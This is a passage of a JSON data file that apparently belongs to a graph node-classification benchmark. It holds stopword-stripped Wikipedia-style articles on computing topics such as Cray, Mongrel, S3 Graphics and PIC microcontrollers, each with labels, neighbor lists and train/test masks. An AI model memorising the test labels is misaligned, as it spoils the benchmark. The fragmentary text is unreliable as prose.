    "label": 7,
    "text": "Ginga_(middleware):ginga middleware ginga middleware specification nipo-brazilian digital tv system sbtvd portuguese sistema brasileiro de tv digital ginga also itu-t recommendation iptv services also considered itu-t recommendations cable broadcast services itu-t j.200 recommendation series rec itu-t j.200 rec itu-t j.201 rec itu-t j.202 terrestrial broadcast services itu-r bt.1889 itu-r bt.1699 itu-r bt.1722 ginga developed based set standardized technologies mainly innovations developed brazilian researchers current reference implementation released gpl license ginga divided two main integrated subsystems allow development applications following two different programming paradigms subsystems called ginga-ncl declarative ncl applications ginga-j imperative java applications case brazilian terrestrial digital tv system digital tv systems following definitions abnt standards ginga middleware abnt 15606 ginga-j required supported fixed receivers optional portable receivers iptv services following h.761 itu-t recommendation ginga-ncl subsystem required terminal type ginga developed telemídia lab pontifical catholic university rio de janeiro puc-rio lavid federal university paraíba ufpb",
    "neighbors": [
      8122,
      5677
    ],
    "mask": "None"
  },
  {
    "node_id": 7428,
    "label": 2,
    "text": "Asus_Zen_UI:asus zen ui asus zen ui stylized asus zenui front-end touch interface developed asus partners featuring full touch user interface current version zenui 6 zenui used asus android phones tablet computers available licensing external parties zenui also comes asus-made apps preloaded like zenlink pc link share link party link remote link zenui made debut asus zenfone series asus memopad 7 me176c asus padfone mini 2014 zenui asus made front-end interface android phones tablets called asus waveshare ui asus waveshare ui front-end touch interface developed asus partners waveshare ui used asus android phones tablet computers available licensing external parties waveshare ui originally released asus padfone hybrid smartphone/tablet later used asus products last gadget use waveshare ui asus memo pad hd 7 asus zenui updated google play store preloaded apps preloaded apps",
    "neighbors": [
      5637,
      8719,
      3600,
      7700,
      9244,
      11294,
      1578,
      5677,
      1083,
      6212,
      69,
      8262,
      4685,
      3664,
      8280,
      8285,
      2658,
      11391,
      1670,
      5262,
      10393,
      7835,
      673,
      8870,
      1191,
      196,
      8907,
      2259,
      8413,
      9949,
      1255,
      8940,
      5892,
      2828,
      280,
      10009,
      10525,
      798,
      288,
      2852,
      8486,
      10537,
      7983,
      3380,
      5431,
      2875,
      3900,
      10045,
      11082,
      332,
      3409,
      8019,
      2901,
      5464,
      5467,
      3940,
      7548,
      4995,
      9610,
      10129,
      5522,
      1427,
      10645,
      2978,
      1959,
      937,
      5546,
      6057,
      7595,
      2001,
      479,
      1516,
      5100,
      5613,
      5620,
      11252,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7429,
    "label": 4,
    "text": "Kaō:kaō kaō huāyā stylized signature mark used east asia place true signature kaō first appeared china tang dynasty began used japan heian period though use became far less widespread edo period continue used even contemporary politicians famous people reading identification individual kaō often requires specialist knowledge whole books devoted topic published often used japanese swordsmith sword tang nakago",
    "neighbors": [
      9576
    ],
    "mask": "Test"
  },
  {
    "node_id": 7430,
    "label": 8,
    "text": "Mongrel_(web_server):mongrel web server mongrel open-source software http library web server written ruby zed shaw used run ruby web applications presents standard http interface makes layering servers front possible using web proxy load balancer combination instead use conventional methods employed run scripts fastcgi scgi communicate made possible integrating custom high-performance http request parser implemented using ragel mongrel first web server used twitter inspired node.js according ryan dahl shaw subsequently created mongrel2 open-source language agnostic web server successor mongrel server one popular configuration run apache http server 2.2 load balancer using mod_proxy_balancer conjunction several mongrel instances mongrel instance would run separate tcp port configured via mongrel_cluster management utility 2010 twitter notable instance configuration switched unicorn mongrel capable serving ruby rails powered sites without requiring web servers though single-threaded application configuration unsuitable light loads original author zed shaw left ruby rails-scene releases mongrel stopped current release 1.1.5 longer able install ruby versions higher 1.9.2 recommended rails 3 fix use much older 1.2.0-pre2 release mongrel n't stable new maintained server called thin uses mongrel parser mongrel also forked unicorn puma essentially parser",
    "neighbors": [
      1920,
      4485,
      9229,
      2191,
      7567,
      1937,
      7695,
      7443,
      1556,
      10771,
      5399,
      9245,
      8350,
      7457,
      3746,
      8994,
      2596,
      3237,
      9125,
      11682,
      7338,
      9387,
      44,
      7983,
      10800,
      11439,
      564,
      4277,
      9780,
      5945,
      6714,
      1852,
      1468,
      5567,
      6338,
      8386,
      10622,
      1223,
      1991,
      11208,
      5578,
      11134,
      595,
      1363,
      4439,
      3545,
      10973,
      225,
      865,
      1250,
      1379,
      2404,
      4837,
      5093,
      8677,
      11625,
      6379,
      5612,
      9580,
      2287,
      11376,
      8691,
      2804,
      4725,
      10611,
      11386,
      3966
    ],
    "mask": "None"
  },
  {
    "node_id": 7431,
    "label": 2,
    "text": "LinuxLive_USB_Creator:linuxlive usb creator linuxlive usb creator free microsoft windows program creates live usb systems installed images supported linux distributions",
    "neighbors": [
      3745,
      9407,
      6436,
      3685,
      5158,
      6797,
      7343,
      7983,
      3859,
      6393,
      6012,
      4637,
      5343
    ],
    "mask": "Test"
  },
  {
    "node_id": 7432,
    "label": 3,
    "text": "Cray:cray cray inc. american supercomputer manufacturer headquartered seattle washington also manufactures systems data storage analytics several cray supercomputer systems listed top500 ranks powerful supercomputers world cray manufactures products chippewa falls wisconsin founder seymour cray born raised company also offices bloomington minnesota numerous sales service engineering r locations around world company predecessor cray research inc. cri founded 1972 computer designer seymour cray seymour cray went form spin-off cray computer corporation ccc 1989 went bankrupt 1995 cray research bought sgi next year cray inc. formed 2000 tera computer company purchased cray research inc. business sgi adopted name acquisition may 17 2019 hewlett packard enterprise announced agreement buy cray inc. 1.3 billion seymour cray began working computing field 1950 joined engineering research associates era saint paul minnesota helped create era 1103 era eventually became part univac began phased left company 1960 years former era employees set control data corporation cdc initially worked cdc headquarters minneapolis grew upset constant interruptions managers eventually set lab home town chippewa falls wisconsin 85 miles east cray string successes cdc including cdc 6600 cdc 7600 cdc ran financial difficulties late 1960s development funds cray follow-on cdc 8600 became scarce told project would put hold 1972 cray left form company cray research inc copying previous arrangement cray kept research development facilities chippewa falls put business headquarters minneapolis company first product cray-1 supercomputer major success significantly faster computers time first system sold within month us 8.8 million seymour cray continued working time cray-2 though ended marginally faster cray x-mp developed another team company cray soon left ceo position become independent contractor started new vlsi technology lab cray-2 boulder colorado cray laboratories 1979 closed 1982 undaunted cray later headed similar spin-off 1989 cray computer corporation ccc colorado springs worked cray-3 project—the first attempt major use gallium arsenide gaas semiconductors computing however changing political climate collapse warsaw pact end cold war resulted poor sales prospects ultimately one cray-3 delivered number follow-on designs never completed company filed bankruptcy 1995 ccc remains began cray final corporation src computers inc. cray research continued development along separate line computers originally lead designer steve chen cray x-mp chen departure cray y-mp cray c90 cray t90 developed original cray-1 architecture achieved much greater performance via multiple additional processors faster clocks wider vector pipes uncertainty cray-2 project gave rise number cray-object-code compatible crayette firms scientific computer systems scs american supercomputer supertek perhaps one firm firms mean compete cray therefore attempted less expensive slower cmos versions x-mp release cos operating system scs cft fortran compiler also considered national labs lanl/llnl developed ctss operating system well joining broader trend toward adoption unixes series massively parallel computers thinking machines kendall square research intel supercomputing systems division ncube maspar meiko scientific took 1980s high performance market first cray research denigrated approaches complaining developing software effectively use machines difficult – true complaint era illiac iv becoming less day cray eventually realized approach likely way forward started five-year project capture lead area plan result dec alpha-based cray t3d cray t3e series left cray remaining supercomputer vendor market besides nec 2000 sites cray installation considered member exclusive club cray operators cray computers considered quite prestigious crays extremely expensive machines number units sold small compared ordinary mainframes perception extended countries well boost perception exclusivity cray research marketing department promotional neckties made mosaic tiny national flags illustrating club cray-operating countries new vendors introduced small supercomputers known minisupercomputers opposed superminis late 1980s early 1990s out-competed low-end cray machines market convex computer series well number small-scale parallel machines companies like pyramid technology alliant computer systems particularly popular one vendor supertek whose s-1 machine air-cooled cmos implementation x-mp processor cray purchased supertek 1990 sold s-1 cray xms machine proved problematic meanwhile not-yet-completed s-2 y-mp clone later offered cray y-mp el later becoming el90 series started sell reasonable numbers 1991–92—to mostly smaller companies notably oil exploration business line evolved cray j90 eventually cray sv1 1998 december 1991 cray purchased assets floating point systems another minisuper vendor moved file server market sparc-based model 500 line smp machines scaled 64 processors ran modified version solaris operating system sun microsystems cray set cray research superservers inc. later cray business systems division sell system cray s-mp later replacing cray cs6400 spite machines powerful available applied appropriate workloads cray never successful market possibly due foreign existing market niche ccc building cray-3/sss went chapter 11 march 1995 cray research merged silicon graphics sgi february 1996 time industry highly critical move noting little overlap two companies either markets technology founder seymour cray died result traffic accident later year sgi immediately sold superservers business sun quickly turned ultrasparc-based starfire project development extremely successful enterprise 10000 range servers sgi use number cray technologies attempt move graphics workstation market supercomputing key among use cray-developed hippi data-bus details interconnects used t3 series sgi long-term strategy merge high-end server line cray product lines two phases code-named sn1 sn2 sn standing scalable node sn1 intended replace t3e sgi origin 2000 systems later became sn-mips sgi origin 3000 architecture sn2 originally intended unify high-end/supercomputer product lines including t90 single architecture goal never achieved sgi divested cray business sn2 name later associated sn-ia sgi altix 3000 architecture sgi ownership one new cray model line sv1 launched 1998 clustered smp vector processor architecture developed j90 technology sgi set separate cray research business unit august 1999 preparation detachment march 2 2000 unit sold tera computer company tera computer company renamed cray inc. deal closed april 4 tera merger tera mta system relaunched cray mta-2 commercial success shipped two customers cray inc. also unsuccessfully badged nec sx-6 supercomputer cray sx-6 acquired exclusive rights sell sx-6 u.s. canada mexico 2002 cray inc. announced first new model cray x1 combined architecture vector mpp supercomputer previously known sv2 x1 end result earlier sn2 concept originated sgi years may 2004 cray announced one partners u.s. department energy fastest-computer-in-the-world project build 50 teraflops machine oak ridge national laboratory cray sued 2002 isothermal systems research patent infringement suit claimed cray used isr patented technology development cray x1 lawsuit settled 2003 november 2004 cray x1 maximum measured performance 5.9 teraflops 29th fastest supercomputer world since x1 superseded x1e faster dual-core processors october 4 2004 company announced cray xd1 range entry-level supercomputers use dual-core 64-bit amd opteron cpus running linux system previously known octigabay 12k cray acquisition company xd1 provided one xilinx virtex ii pro field-programmable gate array fpga node four opteron processors fpgas could configured embody various digital hardware designs could augment processing input/output capabilities opteron processors furthermore fpga contains pair powerpc 405 processors add already considerable power single node cray xd1 although moderately successful eventually discontinued 2004 cray completed red storm system sandia national laboratories red storm become jumping-off point string successful products eventually revitalized cray supercomputing red storm processors clustered 96 unit cabinets theoretical maximum 300 cabinets machine design speed 41.5 teraflops red storm also included innovative new design network interconnects dubbed seastar destined centerpiece succeeding innovations cray cray xt3 massively parallel supercomputer became commercialized version red storm similar many respects earlier t3e architecture like xd1 using amd opteron processors cray xt4 introduced 2006 added support ddr2 memory newer dual-core future quad-core opteron processors utilized second generation seastar2 communication coprocessor also included option fpga chips plugged directly processor sockets unlike cray xd1 required dedicated socket fpga coprocessor august 8 2005 peter ungaro appointed ceo ungaro joined cray august 2003 vice president sales marketing made cray president march 2005 november 13 2006 cray announced new system cray xmt based mta series machines system combined multi-threaded processors used original tera systems seastar2 interconnect used xt4 reusing asics boards cabinets system software used comparatively higher volume xt4 product cost making specialized mta system reduced second generation xmt scheduled release 2011 first system ordered swiss national supercomputing center cscs 2006 cray announced vision products dubbed adaptive supercomputing first generation systems dubbed rainier project used common interconnect network seastar2 programming environment cabinet design i/o subsystem systems included existing xt4 xmt second generation launched xt5h allowed system combine compute elements various types common system sharing infrastructure xt5h combined opteron vector multithreaded fpga compute processors single system april 2008 cray intel announced would collaborate future supercomputer systems partnership produced cray cx1 system launched september year deskside blade server system comprising 16 dual- quad-core intel xeon processors either microsoft windows hpc server 2008 red hat enterprise linux installed 2009 largest computer system cray delivered xt5 system national center computational sciences oak ridge national laboratories system 224,000 processing cores dubbed jaguar fastest computer world measured linpack benchmark speed 1.75 petaflops surpassed tianhe-1a october 2010 first system exceed sustained performance 1 petaflops 64-bit scientific application may 2010 cray xe6 supercomputer announced cray xe6 system core new gemini system interconnect new interconnect included true global-address space represented return t3e feature set successful cray research product successful follow-on xt3 xt4 xt5 products first multi-cabinet xe6 system shipped july 2010 next generation cascade systems designed make use future multicore and/or manycore processors vendors intel nvidia cascade scheduled introduced early 2013 designed use next-generation network chip follow-on gemini code named aries early 2010 cray also introduced cray cx1000 rack-mounted system choice compute-based gpu-based smp-based chassis cx1 cx1000 product lines sold late 2011 2011 cray announced cray xk6 hybrid supercomputer cray xk6 system capable scaling 500,000 processors 50 petaflops peak performance combines cray gemini interconnect amd multi-core scalar processors nvidia tesla gpgpu processors october 2012 cray announced cray xk7 supports nvidia kepler gpgpu announced ornl jaguar system would upgraded xk7 renamed titan capable 20 petaflops titan world fastest supercomputer measured linpack benchmark introduction tianhe-2 2013 substantially faster 2011 cray also announced awarded 188m us blue waters contract university illinois ibm pulled delivery system delivered 2012 largest system date terms cabinets general-purpose x86 processors cray ever delivered november 2011 cray sonexion 1300 data storage system introduced signaled cray entry high performance storage business product used modular technology lustre file system 2011 cray launched openacc parallel programming standard organization however 2019 cray announced deprecating openacc support openmp april 2012 cray inc. announced sale interconnect hardware development program related intellectual property intel corporation 140 million november 9 2012 cray announced acquisition appro international inc. california-based privately held developer advanced scalable supercomputing solutions currently 3 provider top100 supercomputer list appro builds world advanced high performance computing hpc cluster systems 2012 cray opened subsidiary china may 17 2019 hewlett packard enterprise hpe announced purchasing cray 1.4 billion approximately 35 per share deal expected close first quarter hpe fiscal year 2020 ends january 31 2020",
    "neighbors": [
      3328,
      1795,
      1400,
      9095,
      9863,
      9991,
      7820,
      9363,
      1823,
      6179,
      9126,
      9391,
      11697,
      823,
      8631,
      58,
      1724,
      7615,
      9665,
      10051,
      3142,
      1480,
      7497,
      2135,
      2650,
      731,
      6495,
      1638,
      7148,
      3055,
      1776,
      4463,
      5492,
      6518,
      1399,
      3960,
      3323,
      8700,
      11517
    ],
    "mask": "None"
  },
  {
    "node_id": 7433,
    "label": 4,
    "text": "Offline_private_key_protocol:offline private key protocol offline private key protocol opkp cryptographic protocol prevent unauthorized access back archive data protocol results public key used encrypt data offline private key later used decrypt data protocol based three rules regarding key offline private key comply rules offline private key protocol uses method asymmetric key wrapping protocol provide rules strength encryption methods keys used security protocol depends actual cryptographic implementation used combination strong encryption methods protocol provide extreme security initially archiving creating backup session file restore backed archived data",
    "neighbors": [
      7434,
      9134,
      3366
    ],
    "mask": "Test"
  },
  {
    "node_id": 7434,
    "label": 4,
    "text": "Offline_private_key:offline private key offline private key cryptographic key stored network-connected medium key used decrypt archive backup data key result offline private key protocol printed form key trusted paper key",
    "neighbors": [
      7433,
      9134,
      3366
    ],
    "mask": "Test"
  },
  {
    "node_id": 7435,
    "label": 2,
    "text": "Source_Mage:source mage source mage linux distribution package installed source code automatically downloaded compiled installed source mage descended sorcerer source mage name suggests source-based linux distribution instead delivering binaries users source code compiled method allows greater control software precompiled distributions ubuntu individual dependencies selected deselected saving valuable hard drive space freeing ram cpu cycles instance openssh compiled without support x11 sharing one choose set cflags cxxflags ldflags specific situation using source-based distribution one way unlock full performance computer many binary distros compile software wide audience particular group users specific processor source mage spell cast latest stable release downloaded developer site rather source mage allows up-to-date system unlike gentoo another popular source-based distribution maintains customized cache packages smgl changes little possible packages fit bare standards filesystem hierarchy standard immune kind errors resulting distribution developers tampering 2000 kyle sallee released linux distribution named sorcerer gnu/linux due several issues 2002 chuck s. mead forked sorcerer lunar linux soon afterwards kyle sallee took sorcerer gnu/linux offline remaining sorcerer gnu/linux development team brought back online continued development month later kyle sallee brought version sorcerer back online new license prevented forking dropping gnu/linux name consequently request sallee sorcerer gnu/linux team renamed project source mage source mage tagline linux advanced may well magic commands sorcerous theme package called spell package management program called sorcery install package user must cast spell casting spell consists downloading source code already downloaded checking dependencies casting necessary compiling program installing set available spells called grimoire uninstall package user must dispel spell source mage established distribution commitment source mage social contract establishes basic rules similar though identical debian first part contract ensures freedom source mage source mage restrict user choice software free software installing source mage involves first creating minimal installation kernel run gcc c compiler network connection basic tools support downloading compiling source code enables system download compile install components compilation results tailored specific system source mage-maintained code designed presume minimal system base system n't explicitly require c++ compiler gcc 4.x+ replaced besides posix-compliant tools core components require bash sed either gawk mawk instead heavyweight languages like perl python makes source mage suitable small installation",
    "neighbors": [
      515,
      4611,
      3079,
      9735,
      10760,
      7181,
      3089,
      4113,
      8209,
      8213,
      8727,
      6680,
      543,
      11297,
      7204,
      9253,
      5670,
      11305,
      56,
      4153,
      3129,
      59,
      3131,
      8248,
      9276,
      3649,
      4673,
      10817,
      3654,
      5190,
      3147,
      2125,
      1107,
      3667,
      6227,
      1110,
      89,
      5721,
      4192,
      3685,
      9324,
      10860,
      5742,
      2671,
      1138,
      11388,
      7293,
      2692,
      8837,
      9353,
      9873,
      11410,
      10900,
      8857,
      10394,
      6301,
      10397,
      5279,
      673,
      3745,
      1700,
      7332,
      7845,
      4775,
      10920,
      9899,
      6828,
      3245,
      7854,
      2738,
      4790,
      4279,
      10425,
      5819,
      190,
      2239,
      9407,
      2763,
      8907,
      3791,
      6352,
      6361,
      7385,
      11481,
      741,
      231,
      4841,
      6890,
      7913,
      6380,
      7920,
      6898,
      5363,
      9461,
      1782,
      5369,
      6393,
      8957,
      4355,
      11525,
      2310,
      7947,
      9487,
      2321,
      788,
      1813,
      5397,
      4887,
      6934,
      8476,
      8992,
      10530,
      6436,
      2853,
      3369,
      6446,
      1842,
      823,
      2872,
      3387,
      7483,
      3903,
      11587,
      2375,
      5959,
      3918,
      9048,
      2401,
      2914,
      1379,
      8033,
      5990,
      9063,
      9064,
      8554,
      7020,
      7534,
      10096,
      11121,
      9074,
      11648,
      390,
      8582,
      1416,
      905,
      10631,
      2955,
      10127,
      912,
      2448,
      11669,
      10646,
      926,
      9119,
      10149,
      6055,
      7082,
      1455,
      948,
      439,
      6583,
      10172,
      10694,
      4039,
      9671,
      5067,
      463,
      975,
      2513,
      9689,
      2010,
      9693,
      7140,
      485,
      6119,
      5096,
      10732,
      495,
      8177,
      1522,
      8180,
      5110,
      11263
    ],
    "mask": "Test"
  },
  {
    "node_id": 7436,
    "label": 4,
    "text": "Vulnerability_Discovery_Model:vulnerability discovery model vulnerability discovery model vdm uses discovery event data software reliability models predicting thorough presentation vdm techniques available numerous model implementations available mcmcbayes open source repository several vdm examples include",
    "neighbors": [
      3552,
      612,
      5636,
      5373,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 7437,
    "label": 4,
    "text": "Khalil_Sehnaoui:khalil sehnaoui khalil sehnaoui belgian-lebanese information security consultant specialises middle-east founder managing partner beirut-based krypton security also member chaos computer club ccc europe largest association hackers co-founded managing partner security firm krypton security helps test companies security strengths weaknesses potential loopholes online report published april 6 2016 sehnaoui listed one top 100 influencers information security sehnaoui often called upon comment media information security matters sehnaoui born beirut parents marwan sehnaoui mouna bassili sehnaoui 23 may 1975 grew living paris france beirut lebanon father president lebanese order malta mother middle-east painter attended college stanislas paris well collège louise wegman beirut following earned ba management universite saint joseph beirut well masters economics sehnaoui featured guardian video series power privacy 2015 may 2017 sehnaoui went viral twitter internet tweeting getting revenge loud rude customers coffee shop customers loud rude waiters voluble conversation perfect new business name retaliation sehnaoui registered domain name tweeted according mashable twitter users praised sehnaoui act digital savagery sehnaoui also featured national geographic 2017 series breakthrough produced ron howard brian grazer season 2 episode 2 cyber-terror episode offered exclusive look inside shadowy world hackers good battles evil security world stake episode follows “ white-hat ” hackers jayson street darren kitchen khalil sehnaoui security specialists combine clever coding “ mission impossible ” -style “ social engineering. ” 2019 sehnaoui featured amongst 70 information security professionals book called tribe hackers collection industry career personal insights cybersecurity luminaries book quickly rose 1 spot new releases amazon computer security encryption category 2015 controversy sehnaoui identified silent circle warrant canary removed site sehnaoui also prominently featured video series guardian privacy risks often called upon comment recent information security news founding information security firm attempted improve patient representation lebanese insurance industry starting january 2016 reports islamic state allegedly built new android app called alrawi exchanging encrypted messages based claims online counter-terrorism firm ghost security group gsg claim quickly reprinted newsweek fortune techcrunch among others sehnaoui one security specialists helped debunk myth tool showing bad media mock-up try get attention july 2018 arrested alleged piracy several lebanese companies government institutions detention illegal legal vacuum lebanese laws cybercrime released questioned charges brought",
    "neighbors": [
      3629,
      2360,
      4956,
      5373,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7438,
    "label": 9,
    "text": "Array_access_analysis:array access analysis computer science array access analysis compiler analysis used decide read write access patterns elements portions arrays major data type manipulated scientific programs array define/use analysis whole array insufficient aggressive compiler optimizations auto parallelization array privatization array access analysis aims obtain knowledge portions even elements array accessed given code segment basic block loop even procedure level array access analysis largely categorized exact reference-list-based summary methods different tradeoffs accuracy complexity exact methods precise costly terms computation space storage summary methods approximate computed quickly economically typical exact array access analysis include linearization atom images summary methods divided array sections bounded regular sections using triplet notation linear-constraint methods data access descriptors array region analysis",
    "neighbors": [
      7940,
      8262,
      7273,
      3475,
      2620
    ],
    "mask": "Train"
  },
  {
    "node_id": 7439,
    "label": 5,
    "text": "Light_(web_browser):light web browser light formerly known firefox light free open-source web browser based firefox light available windows os x linux operating systems differs firefox built performance achieves removing several firefox built components including crash reporter safe browsing spell checker development tools support various types video audio media",
    "neighbors": [
      9152,
      6797,
      7983,
      119,
      5078,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 7440,
    "label": 4,
    "text": "Byzantine_Foothold:byzantine foothold byzantine foothold unclassified code name related united states department defense effort within larger cyber initiative framework specifically aimed curbing preventing foreign intrusions computer networks us federal agencies said threat related ongoing efforts chinese hackers peoples liberation army public documentation available would prove case twenty largest american military-industrial contractors also invited participate program highly potent hacker attack detected booz allen corp although us government sees largest cyber espionage effort arrests made specific cyber intruder identified public information available state on-going investigation related intrusion",
    "neighbors": [
      3843,
      7798,
      5087
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7441,
    "label": 4,
    "text": "MultigrainMalware:multigrainmalware new sophisticated point-of-sale memory-scraping malware called “ multigrain ” discovered april 17 2016 fireeye inc. security company multigrain malware comes family newposthings malware malware similar newposthings frameworkpos bernhardpos malware known previously notorious malware multigrain uses luhn algorithm validate credit debit card details pos malware infects computer blocks hypertext transfer protocol http file transfer protocol ftp traffic monitors data exfiltration exfiltrates scraped information credit debit card via domain name server dns sends collected payment card information 'command control server server multigrain targets specifically windows point sale system multi.exe executable file multigrain gets pos system multi.exe deletes without leaving trace",
    "neighbors": [
      3072,
      6786,
      7044,
      10245,
      10756,
      9356,
      9233,
      8978,
      4863,
      4883,
      278,
      10392,
      1690,
      3867,
      10141,
      5281,
      2213,
      8998,
      9256,
      939,
      1970,
      3643,
      5563,
      4797,
      6588,
      7739,
      1088,
      9791,
      3395,
      4165,
      10309,
      2887,
      6091,
      2508,
      6360,
      7515,
      4344,
      3941,
      107,
      877,
      3320,
      2041,
      10364,
      5245,
      1279
    ],
    "mask": "None"
  },
  {
    "node_id": 7442,
    "label": 3,
    "text": "S3_Graphics:s3 graphics s3 graphics ltd commonly referred s3 american computer graphics company company perhaps best known virge much improved successor savage 3d chrome series struggling competition 3dfx interactive ati nvidia height 3d accelerator wars graphics portion company spun new joint effort via technologies new company focused mobile graphics market became major player space company purchased htc 2011 although primarily mobile technology company still produce graphics accelerators home computers s3 chrome brand name s3 founded incorporated january 1989 dado banatao ronald yara march 5 1993 s3 began initial public offering 2,000,000 shares common stock nasdaq several profitable years independent startup company struggling transition integrated 3d cards s3 remodeled consumer electronics company sold core graphics division joint venture via technologies 323 million joint venture s3 graphics continues develop market chipsets based s3 graphics technology reformed company carried substantial cash pile profitable trio see days successful investment umc taiwanese semiconductor foundry november 15 2000 s3 changed name sonicblue nasdaq stock symbol sblu new business model focused digital media information appliance opportunities graphics division sold via technologies s3 graphics replaytv rio govideo brands developed sonicblue march 21 2003 sonicblue filed chapter 11 bankruptcy s3 graphics first developed graphic cores via igp chipset years later began produce graphics accelerators home computers chrome brand name include deltachrome gammachrome chrome s27 chrome 440gtx july 6 2011 announced htc corporation would buy via technologies stake s3 graphics thus becoming majority owner s3 graphics s3 produces graphics cards primarily pcs earlier products trio range 2d later 3d functionality added virge savage cards recently s3 chipsets sold integrated via northbridge parts however units also available pci-e chrome 440 series supports directx 10.1 hd blu-ray video 3d acceleration powerful enough run today games moderate settings latest graphics card chrome 530gt supports directx 10.1 opengl 3.0 hd-dvd hd blu-ray video playback gpgpu acceleration image processing using s3fotopro video color correction video encoding transcoding scientific research game physics engineering analysis financial analysis signal processing media chipsets formation 1989 took s3 two years develop world first single-chip graphical user interface gui accelerator integrated functionality enabled attractive pricing solid features competitive prices remained hallmark s3 strategy s3 notable product range s3 trio 2d chipset remains one best selling graphics chipsets time updated number timely revisions time s3 managed keep series one step ahead competition however trio 2d range mid 1990s consumers oems started demand 3d functionality graphics cards internally s3 failed recognise transition quickly enough rush s3 virge range 3d cards cheap popular oems reason performance drivers poor enthusiasts even nicknamed graphics decelerators integrated modern style 3d feature produced s3 savage series graphics cards notably pioneered s3tc proprietary metal api subsequently adopted microsoft royalty industry standard texture compression directx savage also introduced motion compensation engine quality video scaler well hardware alpha-blended sub-picture blending first however 3d performance savage cards never quite enough take significant market share poor yields meant actual clock speeds 30 lower projected development transform lighting engine implementation flawed became apparent s3 integrated 2d technology longer enough ensure overall success chipset s3 could continued development savage cards likely resolved outstanding issues instead 2001 s3 management decided sell core business via 323 million subsequently savage derived chips turned numerous via motherboard chipsets integrated north bridge solution twister unichrome recent discrete derivations carried brand names deltachrome gammachrome manner s3 derived chips held onto 10 share overall pc graphics market sonicblue american consumer electronics company resulting 1999 merger computer peripheral maker diamond multimedia graphics chipset maker s3 incorporated november 2000 combined company changed name sonicblue changed focus graphics chipsets computer peripherals consumer electronics rio line mp3 players january 2001 graphics chipset business sold joint venture sonicblue via called s3 graphics later year company bought replaytv maker pvr systems sensory science corporation company selling dual-deck dvd/vcr systems govideo brand name march 21 2003 sonicblue filed chapter 11 bankruptcy protection sold main product lines april 16 2003 holdings parent company denon ltd. marantz japan inc. purchased virtually operating assets sonicblue produces replaytv rio units new subsidiary digital networks north america dnna inc last piece company effectively sold late 2003 best data acquired diamond supra modem business along rights diamond multimedia name use new video card division august 2005 company said would discontinue making mp3 players licensed digital audio software technology chipmaker sigmatel month",
    "neighbors": [
      9057,
      8514,
      8035,
      10658,
      4902,
      6570,
      3883,
      11627,
      2925,
      6797,
      7215,
      7309,
      6879,
      7442,
      6069,
      10971,
      2943
    ],
    "mask": "None"
  },
  {
    "node_id": 7443,
    "label": 8,
    "text": "Mongrel2:mongrel2 mongrel2 open-source language agnostic web server written zed shaw successor shaw mongrel server server supports http flash xmlsockets websockets long polling connections mongrel2 described language agnostic meaning prefer specific programming language another server documentation says shaw began working server june 2010 released version 1.0 software september 1 2010 mongrel2 nothing common original mongrel webserver except using http parser",
    "neighbors": [
      1920,
      4485,
      7430,
      9229,
      7567,
      7695,
      1937,
      8350,
      7457,
      3746,
      8994,
      2596,
      3237,
      9125,
      11682,
      7338,
      9387,
      44,
      7983,
      10800,
      11439,
      6714,
      10622,
      1991,
      11134,
      595,
      1363,
      4439,
      3545,
      225,
      1250,
      865,
      2404,
      4837,
      9834,
      6379,
      5612,
      9580,
      2287,
      11376,
      8691,
      10611,
      11386,
      2045,
      3966
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7444,
    "label": 2,
    "text": "Interpreter_directive:interpreter directive interpreter directive computer language construct systems better described aspect system executable file format used control interpreter parses interprets instructions computer program unix linux unix-like operating systems first two bytes file characters constitute magic number hexadecimal 23 21 ascii values often referred shebang prefix first line script remainder line command usually limited max 14 introduced usually 80 characters 2016 file system permissions script file include execute permission bit user invoking filename often found command search path used tell operating system interpreter usually program implements scripting language use execute script contents may batch commands might intended interactive use example would /bin/bash meaning run script bash shell found /bin directory systems files may use magic number interpreter directives",
    "neighbors": [
      8631,
      1509,
      2181,
      7983,
      10672,
      11632,
      9714,
      10387,
      5492,
      5397,
      8628,
      823,
      9780,
      11442
    ],
    "mask": "Test"
  },
  {
    "node_id": 7445,
    "label": 3,
    "text": "PIC_microcontrollers:pic microcontrollers pic usually pronounced pick family microcontrollers made microchip technology derived pic1650 originally developed general instrument microelectronics division name pic initially referred peripheral interface controller currently expanded programmable intelligent computer first parts family available 1976 2013 company shipped twelve billion individual parts used wide variety embedded systems early models pic read-only memory rom field-programmable eprom program storage provision erasing memory current models use flash memory program storage newer models allow pic reprogram program memory data memory separated data memory 8-bit 16-bit latest models 32-bit wide program instructions vary bit-count family pic may 12 14 16 24 bits long instruction set also varies model powerful chips adding instructions digital signal processing functions hardware capabilities pic devices range 6-pin smd 8-pin dip chips 144-pin smd chips discrete i/o pins adc dac modules communications ports uart i2c even usb low-power high-speed variations exist many types manufacturer supplies computer software development known mplab x assemblers c/c++ compilers programmer/debugger hardware mplab pickit series third party open-source tools also available parts in-circuit programming capability low-cost development programmers available well high-production programmers pic devices popular industrial developers hobbyists due low cost wide availability large user base extensive collection application notes availability low cost free development tools serial programming re-programmable flash-memory capability original pic intended used general instrument new cp1600 16-bit central processing unit cpu whilst people considered cp1600 good cpu poor i/o performance 8-bit pic developed 1975 improve performance overall system offloading i/o tasks cpu pic used simple microcode stored rom perform tasks although term risc used time shares common features risc designs 1985 general instrument sold microelectronics division new owners cancelled almost everything time mostly out-of-date pic however upgraded internal eprom produce programmable channel controller 2001 microchip introduced flash programmable devices full production commencing 2002 today huge variety pics available various on-board peripherals serial communication modules uarts motor control kernels etc program memory 256 words 64k words word one assembly language instruction varying length 8 16 bits depending specific pic micro family pic picmicro registered trademarks microchip technology generally thought pic stands peripheral interface controller although general instruments original acronym initial pic1640 pic1650 devices programmable interface controller acronym quickly replaced programmable intelligent computer microchip 16c84 pic16x84 introduced 1993 first microchip cpu on-chip eeprom memory 2013 microchip shipping one billion pic microcontrollers every year pic micro chips designed harvard architecture offered various device families baseline mid-range families use 8-bit wide data memory high-end families use 16-bit data memory latest series pic32mz 32-bit mips-based microcontroller instruction words sizes 12-bit pic10 pic12 14-bit pic16 24-bit pic24 dspic binary representations machine instructions vary family shown pic instruction listings within families devices may designated picnncxxx cmos picnnfxxx flash c devices generally classified suitable new development actively promoted microchip program memory c devices variously described otp rom eeprom october 2016 otp product classified production pic16hv540 c devices quartz windows erasure general longer available devices feature 